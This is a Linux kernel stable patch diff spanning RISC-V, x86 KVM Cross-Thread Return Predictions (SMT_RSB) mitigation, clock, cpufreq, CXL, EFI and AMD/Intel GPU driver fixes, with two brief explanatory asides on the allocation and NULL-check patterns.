+index 57b40a3504206..8a2e7040f8fc3 100644
+--- a/arch/riscv/mm/cacheflush.c
++++ b/arch/riscv/mm/cacheflush.c
+@@ -83,8 +83,10 @@ void flush_icache_pte(pte_t pte)
+ {
+ 	struct page *page = pte_page(pte);
+ 
+-	if (!test_and_set_bit(PG_dcache_clean, &page->flags))
++	if (!test_bit(PG_dcache_clean, &page->flags)) {
+ 		flush_icache_all();
++		set_bit(PG_dcache_clean, &page->flags);
++	}
+ }
+ #endif /* CONFIG_MMU */
+ 
+diff --git a/arch/x86/include/asm/cpufeatures.h b/arch/x86/include/asm/cpufeatures.h
+index b2da7cb64b317..92729c38853d1 100644
+--- a/arch/x86/include/asm/cpufeatures.h
++++ b/arch/x86/include/asm/cpufeatures.h
+@@ -463,5 +463,6 @@
+ #define X86_BUG_MMIO_UNKNOWN		X86_BUG(26) /* CPU is too old and its MMIO Stale Data status is unknown */
+ #define X86_BUG_RETBLEED		X86_BUG(27) /* CPU is affected by RETBleed */
+ #define X86_BUG_EIBRS_PBRSB		X86_BUG(28) /* EIBRS is vulnerable to Post Barrier RSB Predictions */
++#define X86_BUG_SMT_RSB			X86_BUG(29) /* CPU is vulnerable to Cross-Thread Return Address Predictions */
+ 
+ #endif /* _ASM_X86_CPUFEATURES_H */
+diff --git a/arch/x86/kernel/cpu/common.c b/arch/x86/kernel/cpu/common.c
+index 3e508f2390983..e80572b674b7a 100644
+--- a/arch/x86/kernel/cpu/common.c
++++ b/arch/x86/kernel/cpu/common.c
+@@ -1235,6 +1235,8 @@ static const __initconst struct x86_cpu_id cpu_vuln_whitelist[] = {
+ #define MMIO_SBDS	BIT(2)
+ /* CPU is affected by RETbleed, speculating where you would not expect it */
+ #define RETBLEED	BIT(3)
++/* CPU is affected by SMT (cross-thread) return predictions */
++#define SMT_RSB		BIT(4)
+ 
+ static const struct x86_cpu_id cpu_vuln_blacklist[] __initconst = {
+ 	VULNBL_INTEL_STEPPINGS(IVYBRIDGE,	X86_STEPPING_ANY,		SRBDS),
+@@ -1266,8 +1268,8 @@ static const struct x86_cpu_id cpu_vuln_blacklist[] __initconst = {
+ 
+ 	VULNBL_AMD(0x15, RETBLEED),
+ 	VULNBL_AMD(0x16, RETBLEED),
+-	VULNBL_AMD(0x17, RETBLEED),
+-	VULNBL_HYGON(0x18, RETBLEED),
++	VULNBL_AMD(0x17, RETBLEED | SMT_RSB),
++	VULNBL_HYGON(0x18, RETBLEED | SMT_RSB),
+ 	{}
+ };
+ 
+@@ -1385,6 +1387,9 @@ static void __init cpu_set_bug_bits(struct cpuinfo_x86 *c)
+ 	    !(ia32_cap & ARCH_CAP_PBRSB_NO))
+ 		setup_force_cpu_bug(X86_BUG_EIBRS_PBRSB);
+ 
++	if (cpu_matches(cpu_vuln_blacklist, SMT_RSB))
++		setup_force_cpu_bug(X86_BUG_SMT_RSB);
++
+ 	if (cpu_matches(cpu_vuln_whitelist, NO_MELTDOWN))
+ 		return;
+ 
+diff --git a/arch/x86/kvm/x86.c b/arch/x86/kvm/x86.c
+index 69227f77b201d..a0c35b948c30b 100644
+--- a/arch/x86/kvm/x86.c
++++ b/arch/x86/kvm/x86.c
+@@ -192,6 +192,10 @@ module_param(enable_pmu, bool, 0444);
+ bool __read_mostly eager_page_split = true;
+ module_param(eager_page_split, bool, 0644);
+ 
++/* Enable/disable SMT_RSB bug mitigation */
++bool __read_mostly mitigate_smt_rsb;
++module_param(mitigate_smt_rsb, bool, 0444);
++
+ /*
+  * Restoring the host value for MSRs that are only consumed when running in
+  * usermode, e.g. SYSCALL MSRs and TSC_AUX, can be deferred until the CPU
+@@ -4435,10 +4439,15 @@ int kvm_vm_ioctl_check_extension(struct kvm *kvm, long ext)
+ 		r = KVM_CLOCK_VALID_FLAGS;
+ 		break;
+ 	case KVM_CAP_X86_DISABLE_EXITS:
+-		r |=  KVM_X86_DISABLE_EXITS_HLT | KVM_X86_DISABLE_EXITS_PAUSE |
+-		      KVM_X86_DISABLE_EXITS_CSTATE;
+-		if(kvm_can_mwait_in_guest())
+-			r |= KVM_X86_DISABLE_EXITS_MWAIT;
++		r = KVM_X86_DISABLE_EXITS_PAUSE;
++
++		if (!mitigate_smt_rsb) {
++			r |= KVM_X86_DISABLE_EXITS_HLT |
++			     KVM_X86_DISABLE_EXITS_CSTATE;
++
++			if (kvm_can_mwait_in_guest())
++				r |= KVM_X86_DISABLE_EXITS_MWAIT;
++		}
+ 		break;
+ 	case KVM_CAP_X86_SMM:
+ 		/* SMBASE is usually relocated above 1M on modern chipsets,
+@@ -6214,15 +6223,26 @@ split_irqchip_unlock:
+ 		if (cap->args[0] & ~KVM_X86_DISABLE_VALID_EXITS)
+ 			break;
+ 
+-		if ((cap->args[0] & KVM_X86_DISABLE_EXITS_MWAIT) &&
+-			kvm_can_mwait_in_guest())
+-			kvm->arch.mwait_in_guest = true;
+-		if (cap->args[0] & KVM_X86_DISABLE_EXITS_HLT)
+-			kvm->arch.hlt_in_guest = true;
+ 		if (cap->args[0] & KVM_X86_DISABLE_EXITS_PAUSE)
+ 			kvm->arch.pause_in_guest = true;
+-		if (cap->args[0] & KVM_X86_DISABLE_EXITS_CSTATE)
+-			kvm->arch.cstate_in_guest = true;
++
++#define SMT_RSB_MSG "This processor is affected by the Cross-Thread Return Predictions vulnerability. " \
++		    "KVM_CAP_X86_DISABLE_EXITS should only be used with SMT disabled or trusted guests."
++
++		if (!mitigate_smt_rsb) {
++			if (boot_cpu_has_bug(X86_BUG_SMT_RSB) && cpu_smt_possible() &&
++			    (cap->args[0] & ~KVM_X86_DISABLE_EXITS_PAUSE))
++				pr_warn_once(SMT_RSB_MSG);
++
++			if ((cap->args[0] & KVM_X86_DISABLE_EXITS_MWAIT) &&
++			    kvm_can_mwait_in_guest())
++				kvm->arch.mwait_in_guest = true;
++			if (cap->args[0] & KVM_X86_DISABLE_EXITS_HLT)
++				kvm->arch.hlt_in_guest = true;
++			if (cap->args[0] & KVM_X86_DISABLE_EXITS_CSTATE)
++				kvm->arch.cstate_in_guest = true;
++		}
++
+ 		r = 0;
+ 		break;
+ 	case KVM_CAP_MSR_PLATFORM_INFO:
+@@ -13730,6 +13750,7 @@ EXPORT_TRACEPOINT_SYMBOL_GPL(kvm_vmgexit_msr_protocol_exit);
+ static int __init kvm_x86_init(void)
+ {
+ 	kvm_mmu_x86_module_init();
++	mitigate_smt_rsb &= boot_cpu_has_bug(X86_BUG_SMT_RSB) && cpu_smt_possible();
+ 	return 0;
+ }
+ module_init(kvm_x86_init);
+diff --git a/drivers/clk/ingenic/jz4760-cgu.c b/drivers/clk/ingenic/jz4760-cgu.c
+index ecd395ac8a28d..e407f00bd5942 100644
+--- a/drivers/clk/ingenic/jz4760-cgu.c
++++ b/drivers/clk/ingenic/jz4760-cgu.c
+@@ -58,7 +58,7 @@ jz4760_cgu_calc_m_n_od(const struct ingenic_cgu_pll_info *pll_info,
+ 		       unsigned long rate, unsigned long parent_rate,
+ 		       unsigned int *pm, unsigned int *pn, unsigned int *pod)
+ {
+-	unsigned int m, n, od, m_max = (1 << pll_info->m_bits) - 2;
++	unsigned int m, n, od, m_max = (1 << pll_info->m_bits) - 1;
+ 
+ 	/* The frequency after the N divider must be between 1 and 50 MHz. */
+ 	n = parent_rate / (1 * MHZ);
+@@ -66,19 +66,17 @@ jz4760_cgu_calc_m_n_od(const struct ingenic_cgu_pll_info *pll_info,
+ 	/* The N divider must be >= 2. */
+ 	n = clamp_val(n, 2, 1 << pll_info->n_bits);
+ 
+-	for (;; n >>= 1) {
+-		od = (unsigned int)-1;
++	rate /= MHZ;
++	parent_rate /= MHZ;
+ 
+-		do {
+-			m = (rate / MHZ) * (1 << ++od) * n / (parent_rate / MHZ);
+-		} while ((m > m_max || m & 1) && (od < 4));
+-
+-		if (od < 4 && m >= 4 && m <= m_max)
+-			break;
++	for (m = m_max; m >= m_max && n >= 2; n--) {
++		m = rate * n / parent_rate;
++		od = m & 1;
++		m <<= od;
+ 	}
+ 
+ 	*pm = m;
+-	*pn = n;
++	*pn = n + 1;
+ 	*pod = 1 << od;
+ }
+ 
+diff --git a/drivers/clk/microchip/clk-mpfs-ccc.c b/drivers/clk/microchip/clk-mpfs-ccc.c
+index 32aae880a14f3..0ddc73e07be42 100644
+--- a/drivers/clk/microchip/clk-mpfs-ccc.c
++++ b/drivers/clk/microchip/clk-mpfs-ccc.c
+@@ -164,12 +164,11 @@ static int mpfs_ccc_register_outputs(struct device *dev, struct mpfs_ccc_out_hw_
+ 
+ 	for (unsigned int i = 0; i < num_clks; i++) {
+ 		struct mpfs_ccc_out_hw_clock *out_hw = &out_hws[i];
+-		char *name = devm_kzalloc(dev, 23, GFP_KERNEL);
++		char *name = devm_kasprintf(dev, GFP_KERNEL, "%s_out%u", parent->name, i);
+ 
+ 		if (!name)
+ 			return -ENOMEM;
+ 
+-		snprintf(name, 23, "%s_out%u", parent->name, i);
+ 		out_hw->divider.hw.init = CLK_HW_INIT_HW(name, &parent->hw, &clk_divider_ops, 0);
+ 		out_hw->divider.reg = data->pll_base[i / MPFS_CCC_OUTPUTS_PER_PLL] +
+ 			out_hw->reg_offset;
+@@ -201,14 +200,13 @@ static int mpfs_ccc_register_plls(struct device *dev, struct mpfs_ccc_pll_hw_clo
+ 
+ 	for (unsigned int i = 0; i < num_clks; i++) {
+ 		struct mpfs_ccc_pll_hw_clock *pll_hw = &pll_hws[i];
+-		char *name = devm_kzalloc(dev, 18, GFP_KERNEL);
+ 
+-		if (!name)
++		pll_hw->name = devm_kasprintf(dev, GFP_KERNEL, "ccc%s_pll%u",
++					      strchrnul(dev->of_node->full_name, '@'), i);
++		if (!pll_hw->name)
+ 			return -ENOMEM;
+ 
+ 		pll_hw->base = data->pll_base[i];
+-		snprintf(name, 18, "ccc%s_pll%u", strchrnul(dev->of_node->full_name, '@'), i);
+-		pll_hw->name = (const char *)name;
+ 		pll_hw->hw.init = CLK_HW_INIT_PARENTS_DATA_FIXED_SIZE(pll_hw->name,
+ 								      pll_hw->parents,
+ 								      &mpfs_ccc_pll_ops, 0);
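The pattern above generalizes: devm_kasprintf() sizes the allocation from the format string and ties its lifetime to the device, where a hand-counted devm_kzalloc()+snprintf() pair can silently truncate when the format grows. A minimal kernel-style sketch, with the surrounding names assumed:

	char *name = devm_kasprintf(dev, GFP_KERNEL, "%s_out%u",
				    parent_name, i);
	if (!name)
		return -ENOMEM;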
+diff --git a/drivers/cpufreq/qcom-cpufreq-hw.c b/drivers/cpufreq/qcom-cpufreq-hw.c
+index 3c623a0bc147f..d10bf7635a0d5 100644
+--- a/drivers/cpufreq/qcom-cpufreq-hw.c
++++ b/drivers/cpufreq/qcom-cpufreq-hw.c
+@@ -137,40 +137,42 @@ static unsigned long qcom_lmh_get_throttle_freq(struct qcom_cpufreq_data *data)
+ 	return lval * xo_rate;
+ }
+ 
+-/* Get the current frequency of the CPU (after throttling) */
+-static unsigned int qcom_cpufreq_hw_get(unsigned int cpu)
++/* Get the frequency requested by the cpufreq core for the CPU */
++static unsigned int qcom_cpufreq_get_freq(unsigned int cpu)
+ {
+ 	struct qcom_cpufreq_data *data;
++	const struct qcom_cpufreq_soc_data *soc_data;
+ 	struct cpufreq_policy *policy;
++	unsigned int index;
+ 
+ 	policy = cpufreq_cpu_get_raw(cpu);
+ 	if (!policy)
+ 		return 0;
+ 
+ 	data = policy->driver_data;
++	soc_data = data->soc_data;
+ 
+-	return qcom_lmh_get_throttle_freq(data) / HZ_PER_KHZ;
++	index = readl_relaxed(data->base + soc_data->reg_perf_state);
++	index = min(index, LUT_MAX_ENTRIES - 1);
++
++	return policy->freq_table[index].frequency;
+ }
+ 
+-/* Get the frequency requested by the cpufreq core for the CPU */
+-static unsigned int qcom_cpufreq_get_freq(unsigned int cpu)
++static unsigned int qcom_cpufreq_hw_get(unsigned int cpu)
+ {
+ 	struct qcom_cpufreq_data *data;
+-	const struct qcom_cpufreq_soc_data *soc_data;
+ 	struct cpufreq_policy *policy;
+-	unsigned int index;
+ 
+ 	policy = cpufreq_cpu_get_raw(cpu);
+ 	if (!policy)
+ 		return 0;
+ 
+ 	data = policy->driver_data;
+-	soc_data = data->soc_data;
+ 
+-	index = readl_relaxed(data->base + soc_data->reg_perf_state);
+-	index = min(index, LUT_MAX_ENTRIES - 1);
++	if (data->throttle_irq >= 0)
++		return qcom_lmh_get_throttle_freq(data) / HZ_PER_KHZ;
+ 
+-	return policy->freq_table[index].frequency;
++	return qcom_cpufreq_get_freq(cpu);
+ }
+ 
+ static unsigned int qcom_cpufreq_hw_fast_switch(struct cpufreq_policy *policy,
+diff --git a/drivers/cxl/core/region.c b/drivers/cxl/core/region.c
+index c4f32c32dfd50..9709bbf773b72 100644
+--- a/drivers/cxl/core/region.c
++++ b/drivers/cxl/core/region.c
+@@ -131,7 +131,7 @@ static int cxl_region_decode_reset(struct cxl_region *cxlr, int count)
+ 		struct cxl_memdev *cxlmd = cxled_to_memdev(cxled);
+ 		struct cxl_port *iter = cxled_to_port(cxled);
+ 		struct cxl_ep *ep;
+-		int rc;
++		int rc = 0;
+ 
+ 		while (!is_cxl_root(to_cxl_port(iter->dev.parent)))
+ 			iter = to_cxl_port(iter->dev.parent);
+@@ -143,7 +143,8 @@ static int cxl_region_decode_reset(struct cxl_region *cxlr, int count)
+ 
+ 			cxl_rr = cxl_rr_load(iter, cxlr);
+ 			cxld = cxl_rr->decoder;
+-			rc = cxld->reset(cxld);
++			if (cxld->reset)
++				rc = cxld->reset(cxld);
+ 			if (rc)
+ 				return rc;
+ 		}
+@@ -186,7 +187,8 @@ static int cxl_region_decode_commit(struct cxl_region *cxlr)
+ 			     iter = ep->next, ep = cxl_ep_load(iter, cxlmd)) {
+ 				cxl_rr = cxl_rr_load(iter, cxlr);
+ 				cxld = cxl_rr->decoder;
+-				cxld->reset(cxld);
++				if (cxld->reset)
++					cxld->reset(cxld);
+ 			}
+ 
+ 			cxled->cxld.reset(&cxled->cxld);
+@@ -991,10 +993,10 @@ static int cxl_port_setup_targets(struct cxl_port *port,
+ 		int i, distance;
+ 
+ 		/*
+-		 * Passthrough ports impose no distance requirements between
++		 * Passthrough decoders impose no distance requirements between
+ 		 * peers
+ 		 */
+-		if (port->nr_dports == 1)
++		if (cxl_rr->nr_targets == 1)
+ 			distance = 0;
+ 		else
+ 			distance = p->nr_targets / cxl_rr->nr_targets;
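A reduced sketch of the guard added above, with types invented for illustration: an optional ops-style hook must be NULL-checked before the call, and initializing rc to 0 keeps the absent-hook case from returning an uninitialized value:

struct decoder {
	int (*reset)(struct decoder *d); /* optional: may be NULL */
};

static int decoder_reset(struct decoder *d)
{
	int rc = 0;

	if (d->reset)
		rc = d->reset(d);
	return rc;
}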
+diff --git a/drivers/firmware/efi/libstub/arm64-stub.c b/drivers/firmware/efi/libstub/arm64-stub.c
+index f9de5217ea65e..42282c5c3fe6a 100644
+--- a/drivers/firmware/efi/libstub/arm64-stub.c
++++ b/drivers/firmware/efi/libstub/arm64-stub.c
+@@ -20,10 +20,13 @@ static bool system_needs_vamap(void)
+ 	const u8 *type1_family = efi_get_smbios_string(1, family);
+ 
+ 	/*
+-	 * Ampere Altra machines crash in SetTime() if SetVirtualAddressMap()
+-	 * has not been called prior.
++	 * Ampere eMAG, Altra, and Altra Max machines crash in SetTime() if
++	 * SetVirtualAddressMap() has not been called prior.
+ 	 */
+-	if (!type1_family || strcmp(type1_family, "Altra"))
++	if (!type1_family || (
++	    strcmp(type1_family, "eMAG") &&
++	    strcmp(type1_family, "Altra") &&
++	    strcmp(type1_family, "Altra Max")))
+ 		return false;
+ 
+ 	efi_warn("Working around broken SetVirtualAddressMap()\n");
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_fence.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_fence.c
+index d0d99ed607ddd..6fdb679321d0d 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_fence.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_fence.c
+@@ -564,7 +564,13 @@ void amdgpu_fence_driver_sw_fini(struct amdgpu_device *adev)
+ 		if (!ring || !ring->fence_drv.initialized)
+ 			continue;
+ 
+-		if (!ring->no_scheduler)
++		/*
++		 * Notice we check for sched.ops since there's some
++		 * override on the meaning of sched.ready by amdgpu.
++		 * The natural check would be sched.ready, which is
++		 * set as drm_sched_init() finishes...
++		 */
++		if (ring->sched.ops)
+ 			drm_sched_fini(&ring->sched);
+ 
+ 		for (j = 0; j <= ring->fence_drv.num_fences_mask; ++j)
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_vm_pt.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_vm_pt.c
+index b5f3bba851db8..01e42bdd8e4e8 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_vm_pt.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_vm_pt.c
+@@ -974,7 +974,7 @@ int amdgpu_vm_ptes_update(struct amdgpu_vm_update_params *params,
+ 			trace_amdgpu_vm_update_ptes(params, frag_start, upd_end,
+ 						    min(nptes, 32u), dst, incr,
+ 						    upd_flags,
+-						    vm->task_info.pid,
++						    vm->task_info.tgid,
+ 						    vm->immediate.fence_context);
+ 			amdgpu_vm_pte_update_flags(params, to_amdgpu_bo_vm(pt),
+ 						   cursor.level, pe_start, dst,
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+index b425ec00817c4..988b1c947aefc 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+@@ -1193,24 +1193,38 @@ static void mmhub_read_system_context(struct amdgpu_device *adev, struct dc_phy_
+ 
+ 	memset(pa_config, 0, sizeof(*pa_config));
+ 
+-	logical_addr_low  = min(adev->gmc.fb_start, adev->gmc.agp_start) >> 18;
+-	pt_base = amdgpu_gmc_pd_addr(adev->gart.bo);
+-
+-	if (adev->apu_flags & AMD_APU_IS_RAVEN2)
+-		/*
+-		 * Raven2 has a HW issue that it is unable to use the vram which
+-		 * is out of MC_VM_SYSTEM_APERTURE_HIGH_ADDR. So here is the
+-		 * workaround that increase system aperture high address (add 1)
+-		 * to get rid of the VM fault and hardware hang.
+-		 */
+-		logical_addr_high = max((adev->gmc.fb_end >> 18) + 0x1, adev->gmc.agp_end >> 18);
+-	else
+-		logical_addr_high = max(adev->gmc.fb_end, adev->gmc.agp_end) >> 18;
+-
+ 	agp_base = 0;
+ 	agp_bot = adev->gmc.agp_start >> 24;
+ 	agp_top = adev->gmc.agp_end >> 24;
+ 
++	/* AGP aperture is disabled */
++	if (agp_bot == agp_top) {
++		logical_addr_low  = adev->gmc.vram_start >> 18;
++		if (adev->apu_flags & AMD_APU_IS_RAVEN2)
++			/*
++			 * Raven2 has a HW issue that it is unable to use the vram which
++			 * is out of MC_VM_SYSTEM_APERTURE_HIGH_ADDR. So here is the
++			 * workaround that increase system aperture high address (add 1)
++			 * to get rid of the VM fault and hardware hang.
++			 */
++			logical_addr_high = (adev->gmc.fb_end >> 18) + 0x1;
++		else
++			logical_addr_high = adev->gmc.vram_end >> 18;
++	} else {
++		logical_addr_low  = min(adev->gmc.fb_start, adev->gmc.agp_start) >> 18;
++		if (adev->apu_flags & AMD_APU_IS_RAVEN2)
++			/*
++			 * Raven2 has a HW issue that it is unable to use the vram which
++			 * is out of MC_VM_SYSTEM_APERTURE_HIGH_ADDR. So here is the
++			 * workaround that increase system aperture high address (add 1)
++			 * to get rid of the VM fault and hardware hang.
++			 */
++			logical_addr_high = max((adev->gmc.fb_end >> 18) + 0x1, adev->gmc.agp_end >> 18);
++		else
++			logical_addr_high = max(adev->gmc.fb_end, adev->gmc.agp_end) >> 18;
++	}
++
++	pt_base = amdgpu_gmc_pd_addr(adev->gart.bo);
+ 
+ 	page_table_start.high_part = (u32)(adev->gmc.gart_start >> 44) & 0xF;
+ 	page_table_start.low_part = (u32)(adev->gmc.gart_start >> 12);
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_hw_sequencer.c b/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_hw_sequencer.c
+index c06538c37a11f..55d63d860ef10 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_hw_sequencer.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_hw_sequencer.c
+@@ -3612,7 +3612,7 @@ void dcn10_set_cursor_position(struct pipe_ctx *pipe_ctx)
+ 						(int)hubp->curs_attr.width || pos_cpy.x
+ 						<= (int)hubp->curs_attr.width +
+ 						pipe_ctx->plane_state->src_rect.x) {
+-						pos_cpy.x = temp_x + viewport_width;
++						pos_cpy.x = 2 * viewport_width - temp_x;
+ 					}
+ 				}
+ 			} else {
+diff --git a/drivers/gpu/drm/amd/pm/amdgpu_pm.c b/drivers/gpu/drm/amd/pm/amdgpu_pm.c
+index 236657eece477..41635694e5216 100644
+--- a/drivers/gpu/drm/amd/pm/amdgpu_pm.c
++++ b/drivers/gpu/drm/amd/pm/amdgpu_pm.c
+@@ -1991,6 +1991,8 @@ static int default_attr_update(struct amdgpu_device *adev, struct amdgpu_device_
+ 		case IP_VERSION(9, 4, 2):
+ 		case IP_VERSION(10, 3, 0):
+ 		case IP_VERSION(11, 0, 0):
++		case IP_VERSION(11, 0, 1):
++		case IP_VERSION(11, 0, 2):
+ 			*states = ATTR_STATE_SUPPORTED;
+ 			break;
+ 		default:
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/inc/pmfw_if/smu13_driver_if_v13_0_0.h b/drivers/gpu/drm/amd/pm/swsmu/inc/pmfw_if/smu13_driver_if_v13_0_0.h
+index d6b964cf73bd1..4bc7aee4d44f8 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/inc/pmfw_if/smu13_driver_if_v13_0_0.h
++++ b/drivers/gpu/drm/amd/pm/swsmu/inc/pmfw_if/smu13_driver_if_v13_0_0.h
+@@ -123,7 +123,8 @@
+ 									(1 << FEATURE_DS_FCLK_BIT) | \
+ 									(1 << FEATURE_DS_LCLK_BIT) | \
+ 									(1 << FEATURE_DS_DCFCLK_BIT) | \
+-									(1 << FEATURE_DS_UCLK_BIT))
++									(1 << FEATURE_DS_UCLK_BIT) | \
++									(1ULL << FEATURE_DS_VCN_BIT))
+ 
+ //For use with feature control messages
+ typedef enum {
+@@ -522,9 +523,9 @@ typedef enum  {
+   TEMP_HOTSPOT_M,
+   TEMP_MEM,
+   TEMP_VR_GFX,
+-  TEMP_VR_SOC,
+   TEMP_VR_MEM0,
+   TEMP_VR_MEM1,
++  TEMP_VR_SOC,
+   TEMP_VR_U,
+   TEMP_LIQUID0,
+   TEMP_LIQUID1,
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/inc/pmfw_if/smu13_driver_if_v13_0_7.h b/drivers/gpu/drm/amd/pm/swsmu/inc/pmfw_if/smu13_driver_if_v13_0_7.h
+index d6b13933a98fb..48a3a3952ceb3 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/inc/pmfw_if/smu13_driver_if_v13_0_7.h
++++ b/drivers/gpu/drm/amd/pm/swsmu/inc/pmfw_if/smu13_driver_if_v13_0_7.h
+@@ -113,20 +113,21 @@
+ #define NUM_FEATURES                          64
+ 
+ #define ALLOWED_FEATURE_CTRL_DEFAULT 0xFFFFFFFFFFFFFFFFULL
+-#define ALLOWED_FEATURE_CTRL_SCPM        (1 << FEATURE_DPM_GFXCLK_BIT) | \
+-                                         (1 << FEATURE_DPM_GFX_POWER_OPTIMIZER_BIT) | \
+-                                         (1 << FEATURE_DPM_UCLK_BIT) | \
+-                                         (1 << FEATURE_DPM_FCLK_BIT) | \
+-                                         (1 << FEATURE_DPM_SOCCLK_BIT) | \
+-                                         (1 << FEATURE_DPM_MP0CLK_BIT) | \
+-                                         (1 << FEATURE_DPM_LINK_BIT) | \
+-                                         (1 << FEATURE_DPM_DCN_BIT) | \
+-                                         (1 << FEATURE_DS_GFXCLK_BIT) | \
+-                                         (1 << FEATURE_DS_SOCCLK_BIT) | \
+-                                         (1 << FEATURE_DS_FCLK_BIT) | \
+-                                         (1 << FEATURE_DS_LCLK_BIT) | \
+-                                         (1 << FEATURE_DS_DCFCLK_BIT) | \
+-                                         (1 << FEATURE_DS_UCLK_BIT)
++#define ALLOWED_FEATURE_CTRL_SCPM	((1 << FEATURE_DPM_GFXCLK_BIT) | \
++					(1 << FEATURE_DPM_GFX_POWER_OPTIMIZER_BIT) | \
++					(1 << FEATURE_DPM_UCLK_BIT) | \
++					(1 << FEATURE_DPM_FCLK_BIT) | \
++					(1 << FEATURE_DPM_SOCCLK_BIT) | \
++					(1 << FEATURE_DPM_MP0CLK_BIT) | \
++					(1 << FEATURE_DPM_LINK_BIT) | \
++					(1 << FEATURE_DPM_DCN_BIT) | \
++					(1 << FEATURE_DS_GFXCLK_BIT) | \
++					(1 << FEATURE_DS_SOCCLK_BIT) | \
++					(1 << FEATURE_DS_FCLK_BIT) | \
++					(1 << FEATURE_DS_LCLK_BIT) | \
++					(1 << FEATURE_DS_DCFCLK_BIT) | \
++					(1 << FEATURE_DS_UCLK_BIT) | \
++					(1ULL << FEATURE_DS_VCN_BIT))
+ 
+ //For use with feature control messages
+ typedef enum {
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/inc/smu_v13_0.h b/drivers/gpu/drm/amd/pm/swsmu/inc/smu_v13_0.h
+index e8c6febb8b64e..992163e66f7b4 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/inc/smu_v13_0.h
++++ b/drivers/gpu/drm/amd/pm/swsmu/inc/smu_v13_0.h
+@@ -28,11 +28,11 @@
+ #define SMU13_DRIVER_IF_VERSION_INV 0xFFFFFFFF
+ #define SMU13_DRIVER_IF_VERSION_YELLOW_CARP 0x04
+ #define SMU13_DRIVER_IF_VERSION_ALDE 0x08
+-#define SMU13_DRIVER_IF_VERSION_SMU_V13_0_0_0 0x34
++#define SMU13_DRIVER_IF_VERSION_SMU_V13_0_0_0 0x37
+ #define SMU13_DRIVER_IF_VERSION_SMU_V13_0_4 0x07
+ #define SMU13_DRIVER_IF_VERSION_SMU_V13_0_5 0x04
+ #define SMU13_DRIVER_IF_VERSION_SMU_V13_0_0_10 0x32
+-#define SMU13_DRIVER_IF_VERSION_SMU_V13_0_7 0x35
++#define SMU13_DRIVER_IF_VERSION_SMU_V13_0_7 0x37
+ #define SMU13_DRIVER_IF_VERSION_SMU_V13_0_10 0x1D
+ 
+ #define SMU13_MODE1_RESET_WAIT_TIME_IN_MS 500  //500ms
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_0_ppt.c b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_0_ppt.c
+index cf96c3f2affe4..508e392547d7a 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_0_ppt.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_0_ppt.c
+@@ -407,6 +407,9 @@ static int smu_v13_0_0_setup_pptable(struct smu_context *smu)
+ 	struct amdgpu_device *adev = smu->adev;
+ 	int ret = 0;
+ 
++	if (amdgpu_sriov_vf(smu->adev))
++		return 0;
++
+ 	ret = smu_v13_0_0_get_pptable_from_pmfw(smu,
+ 						&smu_table->power_play_table,
+ 						&smu_table->power_play_table_size);
+@@ -1257,6 +1260,9 @@ static int smu_v13_0_0_get_thermal_temperature_range(struct smu_context *smu,
+ 		table_context->power_play_table;
+ 	PPTable_t *pptable = smu->smu_table.driver_pptable;
+ 
++	if (amdgpu_sriov_vf(smu->adev))
++		return 0;
++
+ 	if (!range)
+ 		return -EINVAL;
+ 
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_7_ppt.c b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_7_ppt.c
+index eea06939e7da1..5dfeab7b999b8 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_7_ppt.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_7_ppt.c
+@@ -124,6 +124,7 @@ static struct cmn2asic_msg_mapping smu_v13_0_7_message_map[SMU_MSG_MAX_COUNT] =
+ 	MSG_MAP(DFCstateControl,		PPSMC_MSG_SetExternalClientDfCstateAllow, 0),
+ 	MSG_MAP(ArmD3,				PPSMC_MSG_ArmD3,                       0),
+ 	MSG_MAP(AllowGpo,			PPSMC_MSG_SetGpoAllow,           0),
++	MSG_MAP(GetPptLimit,			PPSMC_MSG_GetPptLimit,                 0),
+ };
+ 
+ static struct cmn2asic_mapping smu_v13_0_7_clk_map[SMU_CLK_COUNT] = {
+diff --git a/drivers/gpu/drm/i915/display/intel_bios.c b/drivers/gpu/drm/i915/display/intel_bios.c
+index edbdb949b6ced..178a8cbb75838 100644
+--- a/drivers/gpu/drm/i915/display/intel_bios.c
++++ b/drivers/gpu/drm/i915/display/intel_bios.c
+@@ -2466,6 +2466,22 @@ static enum port dvo_port_to_port(struct drm_i915_private *i915,
+ 					  dvo_port);
+ }
+ 
++static enum port
++dsi_dvo_port_to_port(struct drm_i915_private *i915, u8 dvo_port)
++{
++	switch (dvo_port) {
++	case DVO_PORT_MIPIA:
++		return PORT_A;
++	case DVO_PORT_MIPIC:
++		if (DISPLAY_VER(i915) >= 11)
++			return PORT_B;
++		else
++			return PORT_C;
++	default:
++		return PORT_NONE;
++	}
++}
++
+ static int parse_bdb_230_dp_max_link_rate(const int vbt_max_link_rate)
+ {
+ 	switch (vbt_max_link_rate) {
